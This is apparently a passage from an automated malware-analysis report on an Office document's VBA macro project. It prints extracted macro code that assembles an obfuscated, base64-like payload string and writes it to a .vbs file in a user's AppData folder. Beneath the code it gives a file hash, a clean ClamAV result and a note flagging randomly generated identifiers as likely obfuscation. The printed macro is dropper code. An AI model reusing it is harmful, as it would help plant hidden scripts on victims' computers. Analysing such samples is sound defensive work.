str = str & "RZRmZlZERVTFhCYlZXekJiWnFWa2Va"
str = str & "WVB6a3RSZFpGRlZwYUp3VlhUaFdHV1"
str = str & "hoUlR0MWRWSjZqWVhCUlhpR2hkUkVX"
str = str & "WmtaVGp6a0ZhTlVueVswV2VPMjpWSn"
str = str & "1sVEtOVWpHbF9kSmZqcFxwUmpha1hU"
str = str & "VkRtS1hwVlBvVXdSZF1WRkdOZURGa2"
str = str & "NZaD1uVktwV2l3RlBXdDUyeFZwTVZO"
str = str & "bUZXUllWb1tkWWpUVl5WSkdueFFRYj"
str = str & "pha1NWOTJHU2dsTl5GMkdjWkkxWF5o"
str = str & "TWhaWGlUSldtU1J4VjBYRXhidGRHeW"
str = str & "ZZTkhHV3hUSlZFTl5SV2RHMWFkdGdX"
str = str & "elJoVjhpRmJaTndGT1VaWlY2VEdiWl"
str = str & "NEeGdFYUprVVhZNU1rakt0UmpxbFNk"
str = str & "NVRXWF5CYmhYWGdTRkEyU1J0Vjo1MU"
str = str & "lSUmJsSFdSV0pTa1hWSmFrVmhOYUp0"
str = str & "bEthWmlrWFd4TVJXVERNWnIxb2pOVW"
str = str & "hYV3ViTldueFJNVDBHbXZWcDExbGZw"
str = str & "YUZHbUplRkZqdlNSVjpWalJWMXYwV1"
str = str & "xSVmQzR3RiTlFFV2ZSVkZhbFlZUldH"
str = str & "V1tkVW14MUBWMTZtWFNCYTxTR2dhcE"
str = str & "NsT2ZaWlpha1dhZFVYSFJKVjR3bXJW"
str = str & "WT1rV0hkZUpYbFNSaElrcVVaYlZTSE"
str = str & "NiUnQyMGZkV1hYbXhlaGRsdVFOVjZz"
str = str & "ekdZb3ZFV1xwUWV6MkRVMTUyeVZaTV"
str = str & "RXbXdXWlJGV1xSWWhYR2JiVlNuV1Fs"
str = str & "UzAxVzlWVlZUTlZSZEZyMVtWWmpWaF"
str = str & "NoVjhhRmdjSkdHT1toV2w0bGxSWmRG"
str = str & "dGZaVlZ3Vl9UaGJtaVtsVGl5RlplMX"
str = str & "ZtM1ZGV0ppbFdXVkRHYWpGVm0xMkhh"
str = str & "bFVIdGZKV0JTa1NXbDZsWFc5Wkl3Vl"
str = str & "9WZGZsT1dSV0hVWGdWNUVFd20wVm"
VVV = str
End Function
Sub savefile(XX)
Dim filePath As String
filePath = "C:\Users\WinUline\AppData\code.vbs"
Dim fso As Object
Set fso = CreateObject("Scripting.FileSystemObject")
Dim oFile As Object
Set oFile = fso.CreateTextFile(filePath)
oFile.WriteLine XX
oFile.Close
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 48640 bytes |
SHA-256: a9730be018470d5e55c79fedf22550bd2138f95e955d6a41c183959dc3aa6a8f |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
1004 of 1300 identifiers look randomly generated (e.g. 'RXMWZkdFpXWF1SUmBhWHhTVkJtS11w') — consistent with name-mangling obfuscation.
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.